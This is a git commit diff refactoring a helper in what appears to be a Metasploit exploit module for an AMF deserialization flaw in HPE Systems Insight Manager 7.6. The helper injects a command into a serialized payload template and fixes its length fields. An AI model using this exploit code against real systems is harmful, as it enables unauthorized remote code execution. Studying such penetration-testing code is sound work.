Fix up payload_template_adjustments function to use a simpler loop like structure as per space-r7

gwillcox-r7 · gwillcox-r7 · commit d739bf7809e7 · 2021-03-04T18:34:45.000-06:00
's recommendations
diff --git a/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb b/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb
@@ -99,29 +99,27 @@ def exploit
   def payload_template_adjustments(original_content, cmd)
     original_content['PAYLOAD'] = cmd
     original_content[0x47A..0x47B] = [cmd.length].pack('n')
-
     second_adjustment_length = original_content[0x3C..-1].length * 2
-    if (second_adjustment_length >> 7 >> 7 >> 8) != 0
-      fourth_number = (second_adjustment_length & 0x7F) + 1
-      third_number = (second_adjustment_length >> 7) | 0x80 # And with 0xFF00 to only get the top 8 bytes. Then right shift by 7 to undo the left shift by 7 in the code, and
-      # since this is a number greater than 0x7F, add in the sign bit again by ORing with 0x80.
-      second_number = (second_adjustment_length >> 7 >> 7) | 0x80 # Same thing as above but right shift 7 twice to undo the left shift by 7 twice in the code.
-      first_number = (second_adjustment_length >> 7 >> 7 >> 8) | 0x80 # Same thing as above but right shift 7 twice to undo the left shift by 7 twice in the code and also right shift by 8 to undo the left shift by 8 in the code.
-      original_content[0x3A..0x3B] = [first_number, second_number, third_number, fourth_number].pack('cccc')
-    elsif (second_adjustment_length >> 7 >> 7) != 0
-      third_number = (second_adjustment_length & 0x7F) + 1
-      second_number = (second_adjustment_length >> 7) | 0x80 # And with 0xFF00 to only get the top 8 bytes. Then right shift by 7 to undo the left shift by 7 in the code, and
-      # since this is a number greater than 0x7F, add in the sign bit again by ORing with 0x80.
-      first_number = (second_adjustment_length >> 7 >> 7) | 0x80 # Same thing as above but right shift 7 twice to undo the left shift by 7 twice in the code.
-      original_content[0x3A..0x3B] = [first_number, second_number, third_number].pack('ccc')
-    elsif (second_adjustment_length >> 7) != 0
-      second_number = (second_adjustment_length & 0x7F) + 1
-      first_number = (second_adjustment_length >> 7) | 0x80 # And with 0xFF00 to only get the top 8 bytes. Then right shift by 7 to undo the left shift by 7 in the code, and
-      # since this is a number greater than 0x7F, add in the sign bit again by ORing with 0x80.
-      original_content[0x3A..0x3B] = [first_number, second_number].pack('cc')
-    else
-      original_content[0x3A..0x3B] = [second_adjustment_length + 1].pack('c')
+
+    pack_array = []
+    current_number = second_adjustment_length
+    for count in 0...3
+      if current_number >> 7 == 0
+        break
+      else
+       if count == 2
+          pack_array.prepend((current_number >> 8) | 0x80)
+          break
+        else
+          pack_array.prepend((current_number >> 7) | 0x80)
+          current_number = current_number >> 7
+        end
+        count += 1
+      end
     end
+    pack_array.append((second_adjustment_length & 0x7F) + 1)
+    original_content[0x3A..0x3B] = pack_array.pack('c*')
+
     original_content
   end
 
